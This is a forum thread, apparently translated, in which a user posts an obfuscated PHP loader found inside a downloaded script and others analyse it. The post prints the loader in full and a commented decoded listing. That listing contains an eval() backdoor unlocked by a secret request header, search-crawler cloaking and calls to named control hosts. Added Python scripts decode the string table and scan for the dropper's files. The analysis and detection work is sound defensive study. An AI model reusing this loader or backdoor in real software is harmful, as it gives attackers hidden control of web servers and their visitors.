Decoding a PHP code snippet and interpreting it.

AlexH

I'd like to ask the programmers here if they could help me interpret this code.
What it does, what it's used for, whether it's a security problem, etc.

The encoded code:
Code:
<?php                                                                                                                                                                 /*versio:3.01*/$Il1I=114406;if (!function_exists('I1ll1Il1')){$GLOBALS['Il1I'] = 'VqaW5pX3NldA$kYWxsb3dfdXJsX2ZvcGVu bPbEZGlzcGxheV9lcnJvcnMO(WZnRwL2Z0cDIwMTMxMTE0qMy4wMQ}#ASUlJMTExMQaHR0cDovLwCbSFRUUFMWfb2Zm.A?tYaHR0cHM6Ly8!SFRUUF9IT1NUVJodW5pb24MWLQc2VsZWN0TUkVRVUVTVF9VUkkx@U0NSSVBUX05BTUUoUVVFUllfU1RSSU5H=HkPw(tZGV0ZXJtaW5hdG9yjLgLmxvZwceSFRUUF9ZX0FVVEgGbsYmFzZTY0X2RlY29kZQZka}dmVyc2lviLQwxyLXBocA;SFRUUF9FWEVDUEhQDrIb3V0b2sISFRUUF9VU0VSX0FHRU5UO_LAZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAYQc2V6cW8ubmV0}bZmFzdGFkZHouY29tA}L3czLnBocD91PQdtaJms9aJnQ9cGhwJnA9E$JnY9NZXZhbChnenVuY29tcHJlc3MoYmFzZTY0X2RlY29kZSgiZUp5TlYzMXZtMHdNL3lwWFZGVWdVUUo1YVpMbTRWR3FMbnVLMUlVbVRTZE5XNFV5Y2l4b0JDSWdhNmVxMy8yeGZYZEExbVJxK2tjUCs4NzIrZVZuWHh3eC9XVEZvempsSzExYjhaTG5temhkbGxtdUdjWUxpNEVkN2RLd2pMTTA0TTl4VVJhNjV5U0o0eVdPM2phWll4dTRiUnluY1ZEd3N1WTVYWk8xYlFOMkdLTUQ3TTRRT0VOZzI4QitaVW9GZStxa3ZBd2lua1g2Nld6bTIvN01aR2VubmdPL2hMbHMrbkI3YTdBWFZsTTJjWmhuWmJ6aGVwbnZPQWpMZWJuTFU5WVVjVWpGRDE1R2NjTGxGdDlrcHpOL0JqKzRES3pzbVcyRGNDM2M1WWsyUW5VZVdBMFV5Yk8wQUs1VUFnc2RSTmNEZ2JxMlRKTHNLWUJEUVpSdGVhb1p6QVVwam9ZMlM4UEdxQlozQjJHV2xqd0ZoMnJyc3R4ZXRsb2FzNWkwaDFaa2tNVzBzeWMzK2hGcWRBMmVGUHhRVUtTSkdJeFRENXpzZUdEdFdGSjFZMFJVei9QMjdnQWh5Ylo0QzlDS2F2ZVkvSm1Id0JyTGc3b1VhN0xyaC9tdGY3Y0k0Si9KM21GN3VFUFRqOHU1bVZ4OW1NeE5GaTNoYm4vZE9aOHNIdWJUeGZ4cWV2OFJUOGlRSHo5dzdVK25rK3ZGd3ZzMDhSOFdKcnNnUjhDdUpDSDNpR3VyY3lnS0l4NkVTVmJ3QmhVZHpqZmI4cmN1RDRPYmF6R2FObnBWMFpWVUZTbE1WWkdEcUM0cXN2QW41a1dkZFFNYk04K0dOUzF3Qll1ZTFLbnlsekllYnVnNFFoM2Jyd2d3TzlydU1BbFV5V2ovVFJic1JVYmhWYk13RE1WUGRyTlkzTFVjeXdiQ3QveGJDdjl1c3FLOFpMQjRrU2E5RWtPNHlSTlpkSGR6Ri9qM2x0YlNMRngrbnN6dlBYOTZRT2xEd2ZQenF4K1EwNWZzUlo0bmVVcm0weHBMN3VSUWtjc2JHZXpzak9sL0ZEVTdyOW4vc0xaUmU4TkNyMEl0TmF4dzJnTXFsSEVrbzFoaEFHVUozWWcvYjVOc3hYV3RNczVVSW1IZkxrV29rcnUvMm84MXFNU2JnK2R3SCtsOGZZc3oyYTRFTDRFVk52NVJqQ0hXQ0RNOF
hHZE0reEpvbG1SYTJpV3VpUzhEdEFkYzIvVVdLamIveFhNU0o2UW9WRGtON2lkekNNMVh5WHJFbytnMU1NNnRZUGZDSVZRZVVZSDZ2bDl6Qm0xWkhYVGNyaGxEaDFCK3BLcTc1amkyWW1HdXhnVjVUWmxSNzNJNkp1c2JqNnFiakk5dllTY3VxNGx0c0toTGVQWkdjUWNWTzlMbGttMjVSWm1YR2VBditPZVFrbTRIazhQQWNFWlp6cGZoR2dvc3dFSlpGa3lHd1AyM2pnOGFDeUszbVVndUlKcTFzTjRBTFVZWVFBbGY1ZkhIaG8wWEY5VGNhc1ErS3VzQ2V1SGdmYkpld1NyOTVLaXIrMkNWMDBOZkkySWM1eFAydldVUGU0S05BVDBhejdhRHpyOTRoeEtyRWMxMkIzSy9iVUJyT0tDNEVqbmFyeUJza2lYZ2JyQ0tjeDdDU1BKYnAzU3dLWFdCbUM0QklvTGdvM2M3Q1FMRCt1RE5BZXo5K1JmUWNIYzF2NElsWlRvMUpaZGQ1Zm55dDg2MDFvci9haFhyRFJTdjFpbzMyNVlWUVNjKzM2WHhjMDN5cmllS1VsdXNMVDdkYVkvN2xFbEZta3cvTjNlb1Q3QnFqeUlQa0I2VVhnMFBPd0NYNVNvb3hZVTF3MVJYdFRTeHRmcDgycDdMNGFFbERoVkh1Q0ZrT1FmZVhzNUxoMURXNDgrWHlYNGlXNXdraXNyRHBlVWU5S3dZZllyZ0tZL0w1WGN4UzlVbnlSZ2FLSWc0WXQ5Qi8wK0ZrcXBkaW0walNtd3FrYVR1amdqMkFDOHZUSXluamJtejA2VjhVZE9qcWpDQ095ZHhGU0ljeXZHcVJPaDJvSDNtamplcm50SnB5V1luOGRHU2NJandCM2dPSTl1S3U0ZlMwcXFONnlIR0dwYVVQdnFMOVpWSUFjallyTkZoaXRxVTJSSG9mQVJBMjRqcmVDdlhsV3JGR0FzNE02dGhwTjNIb1J1N28yZzlzc1BzOWFsNlFFZHdIeGltNmhTMU1SM0hGaGNVemFYSjZLR1ZhbmJCd1RQQllKQVpoOHp1SU1RTEtJRW5CUCsxVE5TcGQ5cllkYkJGbUt4QkFSTTZoc2lLNTdqVVJZSmdEdG8yT3ZjanpwZ2pFWHJ5OXZqdlhhUFRIVkxIM09zYWFueW9kL1VwNWsxRCtoQ3hIclF2S2pNY0NtRjQrYk9ub0FsbXhUMXhYYkpPakRjZ2hTYjRTTXlMUjNPaW9iUGI3cU1WY3RKeDZMMHkzbUZGNGNtRFBiR3FCcHptc0k1cDZrWGRNRnpqL0dYQUlGTENWQ0pzVkI4a0hUNW9xS3NHTFhGUVRBcm9ibmNCdzl0ZTNTdkVFQyt2S3ZzeCttVzJDOWQ2c3lJQUdNTmt0K0pCbG9aOGo5T29lQlZZZUdhaE5vRTgrS3Z3dnVHZUlRMEFUWS9SVEZDbDdCc2pEUEhTUkV4cE9GS1M1QlFsMHFnV1NhWFlsZVVCTHFzNTZPeHVCUXdOeGtCTUptOHJxanZzeXlPK2dFbnlNVDNpL256RjBxVmhXSzBmc3FORFRoWG9LNThteDVGSnpsYi9BenJqaTJZPSIpKSk7cHJlZ19yZXBsYWNlQb';function I1ll1Il1($a, $b){$c=$GLOBALS['Il1I']; $d=pack('H*','6261736536345f646'.'5636f6465'); return $d(substr($c, $a, $b));};$QO000Q000 = I1ll1Il1(3374, 16);$QO000Q000("/QQ0QQOOOQ/e", I1ll1Il1(502, 2872), "QQ0QQOOOQ");};?><?php

The decoded code, here:

Code:
<?php if (!defined("determinator")) {
    // I1ll1Il1() is the helper defined by the loader above: base64_decode(substr($GLOBALS['Il1I'], $off, $len)).
    // The value each call resolves to is given in the comment beside it.
    if (function_exists(I1ll1Il1(2, 10))) {         // "ini_set"
        @ini_set(I1ll1Il1(14, 20), 1);              // allow_url_fopen = 1
        @ini_set(I1ll1Il1(39, 19), 0);              // display_errors = 0
    }
    function w3net_feof($QQO0OQ, &$I1111l = NULL) {
        $I1111l = microtime(true);
        return feof($QQO0OQ);
    }
    // Fetch a URL from the control host by whichever method the server allows:
    // file_get_contents (w=fgc), then curl (w=cu), then a raw socket on port 80 (w=sk).
    function w3net_getfile($QQO0OO, $QOQQQQ) {
        $QO0Q00 = "curl";
        $I1IIl1 = $QO0Q00 . "_init";
        if (@ini_get("allow_url_fopen") == "1") {
            return @file_get_contents("http://" . $QQO0OO . $QOQQQQ . "&w=fgc");
        } elseif (function_exists($I1IIl1)) {
            $Ill11I = @$I1IIl1();
            $IllIII = $QO0Q00 . "_setopt";
            $QQQO0O = $QO0Q00 . "_exec";
            @$IllIII($Ill11I, CURLOPT_URL, "http://" . $QQO0OO . $QOQQQQ . "&w=cu");
            @$IllIII($Ill11I, CURLOPT_HEADER, false);
            @$IllIII($Ill11I, CURLOPT_RETURNTRANSFER, true);
            @$IllIII($Ill11I, CURLOPT_CONNECTTIMEOUT, 6);
            $IIllll = @$QQQO0O($Ill11I);
            @curl_close($Ill11I);
            if (empty($IIllll)) {
                $IIllll = "";
            }
            return $IIllll;
        } else {
            $QQO0OQ = @fsockopen($QQO0OO, 80, $Q00OO0, $QQ00O0, 5);
            if ($QQO0OQ) {
                $IlII11 = "";
                $I1111l = NULL;
                @fputs($QQO0OQ, "GET {$QOQQQQ}" . "&w=sk HTTP/1.0" . "
" . "Host: " . "{$QQO0OO}
");
                $III11I = PHP_OS . "/" . PHP_VERSION;   // OS and PHP version are sent to the control host as User-Agent
                @fputs($QQO0OQ, "User-Agent: {$III11I}

");
                while (!w3net_feof($QQO0OQ, $I1111l) && (microtime(true) - $I1111l) < 2) {
                    $IlII11.= @fgets($QQO0OQ, 128);
                }
                @fclose($QQO0OQ);
                $IllI1I = explode("

", $IlII11);
                unset($IllI1I[0]);                   // drop the HTTP response headers, keep the body
                return implode("

", $IllI1I);
            }
        }
    }
    function w3net_output($Q0Q0Q0, $QQOO0Q) {       // prints "Y_<name>:<value>" for the operator
        echo "Y_" . $Q0Q0Q0 . ":" . $QQOO0Q . "
";
    }
    function php_server($Q0QO0Q) {
        return @$_SERVER[$Q0QO0Q];
    }
    $I11lI1 = I1ll1Il1(61, 20);                     // "ftp/ftp20131114" (build/campaign id, sent as p=)
    $QOQOOO = I1ll1Il1(82, 6);                      // "3.01" (version, sent as v=)
    $Q0QO00 = I1ll1Il1(91, 10);                     // "III1111" (salt for the per-site key)
    $QQO0OO = I1ll1Il1(101, 10);                    // "http://"
    if (isset($_SERVER[I1ll1Il1(113, 7) ])) {       // $_SERVER['HTTPS']
        if (@$_SERVER[I1ll1Il1(113, 7) ] != I1ll1Il1(122, 4)) {   // != "off"
            $QQO0OO = I1ll1Il1(131, 11);            // "https://"
        }
    }
    $QQO0OO.= strtolower(@$_SERVER[I1ll1Il1(143, 12) ]);   // . HTTP_HOST, e.g. "http://example.com"
    // Blank any GET value containing "union" or "select" (a crude SQLi filter for the injected pages;
    // strpos() without !== false, so a match at offset 0 is missed).
    foreach ($_GET as $Q0Q0Q0 => $QQOO0Q) {
        if (strpos($QQOO0Q, I1ll1Il1(158, 7))) {    // "union"
            $_GET[$Q0Q0Q0] = I1ll1Il1(166, 0);      // ""
        } elseif (strpos($QQOO0Q, I1ll1Il1(169, 8))) {   // "select"
            $_GET[$Q0Q0Q0] = I1ll1Il1(166, 0);      // ""
        }
    }
    if (!isset($_SERVER[I1ll1Il1(178, 15) ])) {    // REQUEST_URI missing (CGI setups): rebuild it
        $_SERVER[I1ll1Il1(178, 15) ] = @$_SERVER[I1ll1Il1(195, 15) ];   // from SCRIPT_NAME
        if (isset($_SERVER[I1ll1Il1(211, 16) ])) {                       // QUERY_STRING
            $_SERVER[I1ll1Il1(178, 15) ].= I1ll1Il1(230, 2) . @$_SERVER[I1ll1Il1(211, 16) ];   // "?" . QUERY_STRING
        }
    }
    // First writable directory wins. Note the WordPress upload and cache directories at the end:
    // a restore that only overwrites files leaves anything dropped there in place.
    function get_temp_directory() {
        $Q0QOOO = dirname(__FILE__) . DIRECTORY_SEPARATOR;
        $QOO0OO = Array("/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", @$_SERVER["TMP"], @$_SERVER["TEMP"], @$_ENV["TMP"], @$_ENV["TMPDIR"], @$_ENV["TEMP"], "/tmp", @ini_get("upload_tmp_dir"), $Q0QOOO . "tmp", $Q0QOOO . "wp-content/uploads", $Q0QOOO . "wp-content/cache",);
        foreach ($QOO0OO as $QQQQQO) {
            if (!empty($QQQQQO)) {
                $QQQQQO.= DIRECTORY_SEPARATOR;
                if (@is_writable($QQQQQO)) {
                    $Q0QOOO = $QQQQQO;
                    break;
                }
            }
        }
        return $Q0QOOO;
    }
    if (strlen($QQO0OO) < 10) {
        define(I1ll1Il1(234, 16), 0);               // define("determinator", 0)
    } elseif ($I11l1l = $QQO0OO . @$_SERVER[I1ll1Il1(178, 15) ]) {   // full URL of the current request
        $QQ0QOQ = @md5($QQO0OO . PHP_OS . $QOQOOO . $Q0QO00);   // per-site key: md5(site . PHP_OS . "3.01" . "III1111")
        $w3n_code = get_temp_directory() . I1ll1Il1(251, 2) . $QQ0QOQ;   // "<tmpdir>/.<md5>": hidden cache file
        define(I1ll1Il1(234, 16), $w3n_code);       // define("determinator", <cache path>)
        $QOOQQQ = $w3n_code . I1ll1Il1(253, 6);     // "<cache>.log"
        // Backdoor: a request whose "Y-Auth" header equals the per-site key gets the
        // base64 carried in its "Execphp" header decoded and passed to eval().
        if (@$_SERVER[I1ll1Il1(261, 15) ] == $QQ0QOQ) {     // $_SERVER['HTTP_Y_AUTH']
            $QOO0QQ = I1ll1Il1(279, 18);            // "base64_decode"
            echo "
";
            w3net_output(I1ll1Il1(301, 8), $QOQOOO . I1ll1Il1(310, 2) . $I11lI1 . I1ll1Il1(315, 6));   // prints Y_versio:3.01-ftp/ftp20131114-php
            if ($IIl1ll = $QOO0QQ(@$_SERVER[I1ll1Il1(322, 16) ])) {   // base64_decode($_SERVER['HTTP_EXECPHP'])
                eval($IIl1ll);
                echo "
";
                w3net_output(I1ll1Il1(341, 4), I1ll1Il1(345, 3));   // prints Y_out:ok
            }
            exit(0);
        }
        // Cloaking: only visits whose User-Agent names a search-engine crawler are logged and trigger the fetch.
        $QQQ00Q = False;
        $QQ0QQQ = @strtolower(@$_SERVER[I1ll1Il1(349, 20) ]);   // HTTP_USER_AGENT
        foreach (explode(I1ll1Il1(371, 2), I1ll1Il1(373, 54)) as $IIll1l) {   // explode(",", "google,yahoo,baidu,bingbot,msnbot,yandex")
            if (strpos($QQ0QQQ, $IIll1l) !== False) {
                $Il1IlI = @fopen($w3n_code . I1ll1Il1(253, 6), I1ll1Il1(427, 2));   // fopen("<cache>.log", "a")
                $Ill1l1 = @urlencode(@$_SERVER[I1ll1Il1(178, 15) ]);   // REQUEST_URI
                @fwrite($Il1IlI, time() . "    " . $IIll1l . "    " . $Ill1l1 . "
");
                @fclose($Il1IlI);
                $QQQ00Q = True;
                break;
            }
        }
        if (@is_file($w3n_code)) {
            @touch($w3n_code);
            @include_once ($w3n_code);              // execute whatever PHP is cached in the hidden file
        } elseif ($QQQ00Q === True) {
            $Q00000 = Array(I1ll1Il1(429, 12), I1ll1Il1(443, 16));   // control hosts: "sezqo.net", "fastaddz.com"
            if (@touch($w3n_code)) {
                $I11l1l = @urlencode($I11l1l);
                // "/w3.php?u=" . <request URL> . "&k=" . <per-site key> . "&t=php&p=" . "ftp/ftp20131114" . "&v=" . "3.01"
                $QOQQQQ = I1ll1Il1(461, 14) . $I11l1l . I1ll1Il1(478, 4) . $QQ0QOQ . I1ll1Il1(483, 12) . $I11lI1 . I1ll1Il1(497, 4) . $QOQOOO;
                $Il1III = w3net_getfile($Q00000[0], $QOQQQQ);   // only the first host is contacted; the response is not written to disk in this listing
                @touch($w3n_code);
            }
        }
    } else {
        define(I1ll1Il1(234, 16), 1);               // define("determinator", 1)
    }
}


If you have trouble reading it here, open the link below.
http://www.unphp.net/decode/a4d90160a54739fd27265c783cfbcc2b/


Thanks
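How the loader hides its strings, shown as an added example (Python, not code from the thread or from the sample): the first line of the sample defines I1ll1Il1($a, $b) as base64_decode(substr($GLOBALS['Il1I'], $a, $b)), with the name base64_decode itself rebuilt from hex by pack('H*', ...), so every I1ll1Il1(offset, length) in the decoded listing is a slice of that junk-salted base64 blob. The script below reimplements the lookup, inlines the resolved strings into a fragment of the listing, and derives the name of the hidden cache file the same way the second stage does. It carries the first 502 characters of the blob, copied from the sample, which cover every string the decoded listing uses; the cache-file function assumes PHP_OS is "Linux", and "example.com" is a made-up host.

```python
"""Resolve the string table of the posted loader (added example, not from the thread)."""
import base64
import hashlib
import re

# First 502 characters of $GLOBALS['Il1I'], copied from the sample.  Offsets 502..3373
# hold the zlib-compressed second stage and 3374..3389 the name "preg_replace" (omitted).
TABLE = (
    "VqaW5pX3NldA$kYWxsb3dfdXJsX2ZvcGVu bPbEZGlzcGxheV9lcnJvcnMO(WZnRwL2Z0cDIwMTMxMTE0qMy4wMQ}#A"
    "SUlJMTExMQaHR0cDovLwCbSFRUUFMWfb2Zm.A?tYaHR0cHM6Ly8!SFRUUF9IT1NUVJodW5pb24MWLQc2VsZWN0T"
    "UkVRVUVTVF9VUkkx@U0NSSVBUX05BTUUoUVVFUllfU1RSSU5H=HkPw(tZGV0ZXJtaW5hdG9yjLgLmxvZwceSFRUUF9ZX0FVVEg"
    "GbsYmFzZTY0X2RlY29kZQZka}dmVyc2lviLQwxyLXBocA;SFRUUF9FWEVDUEhQDrIb3V0b2sISFRUUF9VU0VSX0FHRU5UO_"
    "LAZ29vZ2xlLHlhaG9vLGJhaWR1LGJpbmdib3QsbXNuYm90LHlhbmRleAYQc2V6cW8ubmV0}bZmFzdGFkZHouY29tA}"
    "L3czLnBocD91PQdtaJms9aJnQ9cGhwJnA9E$JnY9N"
)

NOT_B64 = re.compile(r"[^A-Za-z0-9+/]")
CALL = re.compile(r"I1ll1Il1\((\d+),\s*(\d+)\)")


def lookup(offset: int, length: int, table: str = TABLE) -> str:
    """PHP's non-strict base64_decode(substr(...)): characters outside the base64
    alphabet are dropped and missing '=' padding is tolerated, which is exactly
    what lets the author salt the blob with junk between the real strings."""
    chunk = NOT_B64.sub("", table[offset:offset + length])
    chunk += "=" * (-len(chunk) % 4)
    return base64.b64decode(chunk).decode("latin-1")


def inline_strings(php: str, table: str = TABLE) -> str:
    """Rewrite every I1ll1Il1(off, len) call in a listing as the literal it yields."""
    def repl(m: re.Match) -> str:
        s = lookup(int(m.group(1)), int(m.group(2)), table)
        return "'" + s.replace("\\", "\\\\").replace("'", "\\'") + "'"
    return CALL.sub(repl, php)


def cache_file_name(site: str, php_os: str = "Linux") -> str:
    """Name of the hidden cache file: "." + md5(site . PHP_OS . "3.01" . "III1111"),
    where site is the scheme plus the lowercased HTTP_HOST.  The same md5 is the
    value the "Y-Auth" request header must carry to reach the eval() branch."""
    key = site + php_os + lookup(82, 6) + lookup(91, 10)
    return "." + hashlib.md5(key.encode()).hexdigest()


# The backdoor branch of the decoded listing, copied from the post.
BACKDOOR_FRAGMENT = """\
if (@$_SERVER[I1ll1Il1(261, 15) ] == $QQ0QOQ) {
    $QOO0QQ = I1ll1Il1(279, 18);
    if ($IIl1ll = $QOO0QQ(@$_SERVER[I1ll1Il1(322, 16) ])) {
        eval($IIl1ll);
"""

if __name__ == "__main__":
    print(inline_strings(BACKDOOR_FRAGMENT))
    print("control hosts:", lookup(429, 12), lookup(443, 16))
    print("crawler list:", lookup(373, 54))
    print("cache file:", cache_file_name("http://example.com"))   # made-up host
```

Offsets 502..3373 decode to the text `eval(gzuncompress(base64_decode("eJy...")));` and 3374..3389 to `preg_replace`, so the last statement of the loader is preg_replace("/QQ0QQOOOQ/e", "<that eval>", "QQ0QQOOOQ"): the subject matches the pattern and the /e modifier runs the replacement as PHP, which is what starts the decoded listing. That modifier was removed in PHP 7.0, so this loader only works on PHP 5.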
 
At first glance, it's an encrypted piece of code that lets an attacker take control of that domain.
I see it uses various functions that allow writing new files on the server and reading data remotely, and even, if the server allows it, executing shell scripts.
In principle, whoever has something like this on their server can consider it compromised and should restore everything from backup and change the access passwords (careful: you should delete everything on the server, because you don't know what new files the attacker put there; the backup only overwrites existing files but doesn't delete the extras; plus rebuild the database, since you don't know what admin-rights users he wrote into it).

The code wasn't written by a beginner; it's fairly well thought out (ignoring the encryption part), whoever wrote it has plenty of programming and security + Linux knowledge.
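What to look for on a server that carries this, as an added example that is not part of the thread (Python; the directory list and the string patterns come from the decoded listing, and the files the demo builds are constructed): the loader never names preg_replace in clear text, so grepping for it finds nothing, but the "/.../e" pattern argument, the pack('H*', ...) trick that spells base64_decode, the /*versio: marker and the one-very-long-line layout are all visible in the file. The second stage additionally leaves a hidden ".<md5>" cache file and a ".<md5>.log" next to it in the first writable directory of its list, which includes wp-content/uploads and wp-content/cache, places a restore that only overwrites files does not clean. The script scans a web root for both kinds of artefact.

```python
"""Hunt for what this dropper leaves on disk (added example, not from the thread)."""
import os
import re
import tempfile
from pathlib import Path

# Writable locations the decoded get_temp_directory() probes, in the sample's order;
# relative entries are resolved against the web root.
CACHE_DIRS = ["/dev/shm", "/tmp/.font-unix", "/tmp/.ICE-unix", "/tmp",
              "tmp", "wp-content/uploads", "wp-content/cache"]

# "." + 32 hex digits, optionally with the ".log" companion written on crawler visits.
CACHE_NAME = re.compile(r"^\.[0-9a-f]{32}(\.log)?$")

# Markers taken from the loader line of the sample.  The callee of the final call is a
# variable, so the /e check keys on the pattern argument: a "/.../e" string literal with
# only PCRE modifier letters after the closing slash, followed by a comma.
PCRE_MODS = "imsxuUXJADSe"
CODE_MARKERS = {
    "regex_e_modifier": re.compile(
        r"""\(\s*['"]/[^'"\n]+/[%s]*e[%s]*['"]\s*,""" % (PCRE_MODS, PCRE_MODS)),
    "pack_hex_funcname": re.compile(r"""pack\s*\(\s*['"]H\*['"]"""),
    "versio_marker": re.compile(r"/\*versio:\d"),
}
LONG_LINE = 1500   # the sample is a single line of roughly 4000 characters


def scan_php(path: Path) -> list:
    """Names of the markers that fire on one PHP file (empty list = nothing found)."""
    text = path.read_text(errors="replace")
    hits = [name for name, rx in CODE_MARKERS.items() if rx.search(text)]
    if any(len(line) > LONG_LINE and "<?php" in line for line in text.splitlines()):
        hits.append("long_single_line")
    return hits


def find_cache_files(root: Path, dirs=CACHE_DIRS) -> list:
    """Hidden ".<md5>" / ".<md5>.log" files in the dropper's candidate directories."""
    found = []
    for d in dirs:
        base = Path(d) if os.path.isabs(d) else root / d
        if base.is_dir():
            found += [str(f) for f in sorted(base.iterdir()) if CACHE_NAME.match(f.name)]
    return found


def scan_webroot(root: Path, dirs=CACHE_DIRS) -> dict:
    """Every PHP file under root that trips a marker, plus the cache files."""
    php = {}
    for p in sorted(root.rglob("*.php")):
        hits = scan_php(p)
        if hits:
            php[str(p.relative_to(root))] = hits
    return {"php": php, "cache": find_cache_files(root, dirs)}


def demo_tree() -> Path:
    """Constructed web root: a clean file, a file with a loader prepended in the sample's
    layout (string table shortened to filler), and a cache pair in wp-content/uploads.
    The hex digest is made up, not a real per-site key."""
    root = Path(tempfile.mkdtemp(prefix="w3net-demo-"))
    (root / "index.php").write_text("<?php\necho 'clean';\n")
    loader = (
        "<?php /*versio:3.01*/$Il1I=114406;if (!function_exists('I1ll1Il1')){"
        "$GLOBALS['Il1I'] = '" + "Q" * 1600 + "';"
        "function I1ll1Il1($a, $b){$c=$GLOBALS['Il1I']; "
        "$d=pack('H*','6261736536345f646'.'5636f6465'); return $d(substr($c, $a, $b));};"
        "$QO000Q000 = I1ll1Il1(3374, 16);"
        "$QO000Q000(\"/QQ0QQOOOQ/e\", I1ll1Il1(502, 2872), \"QQ0QQOOOQ\");};?><?php\n"
        "echo 'original file continues here';\n"
    )
    (root / "wp-config.php").write_text(loader)
    uploads = root / "wp-content" / "uploads"
    uploads.mkdir(parents=True)
    digest = "0123456789abcdef0123456789abcdef"
    (uploads / ("." + digest)).write_text("<?php /* cached second stage would live here */\n")
    (uploads / ("." + digest + ".log")).write_text("1384400000\tgoogle\t%2F\n")
    return root


def run_demo() -> dict:
    """Scan the constructed tree; only the relative cache dirs are used so the demo
    does not depend on what happens to be in the real /tmp or /dev/shm."""
    root = demo_tree()
    return scan_webroot(root, [d for d in CACHE_DIRS if not os.path.isabs(d)])


if __name__ == "__main__":
    result = run_demo()
    for path, hits in result["php"].items():
        print(path, "->", ", ".join(hits))
    for cache in result["cache"]:
        print("cache artefact:", cache)
```

On a real host run scan_webroot() with the full CACHE_DIRS list, and treat a hit on either the hidden cache pair or the regex_e_modifier marker as confirmation rather than suspicion; the long-line and pack('H*') checks also fire on some legitimate minified or packaged PHP and are there to rank files for manual review.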
 
Thanks a lot for the reply.

I didn't put the script on the server. Anything I find on the net, I first test and scan on my computer. If I consider it safe, then I upload it somewhere.
Since I posted the code here on the forum I don't have any problems, right?

The whole script that contains this code is full of backdoors.

I already knew about the WordPress comment thing.
 
marian gave you a link to the decoded code, explained piece by piece; you should read the link he gave.
The fact that you posted the code here is fine, it's not interpreted so it won't execute, don't worry.

I recommend you stop doing "anything I find on the net, I first scan and test on my PC", because you can infect your PC and then compromise, via FTP, every domain you have access to.
If you want to test something you know isn't ok, test it in a virtual machine (on your local PC).
 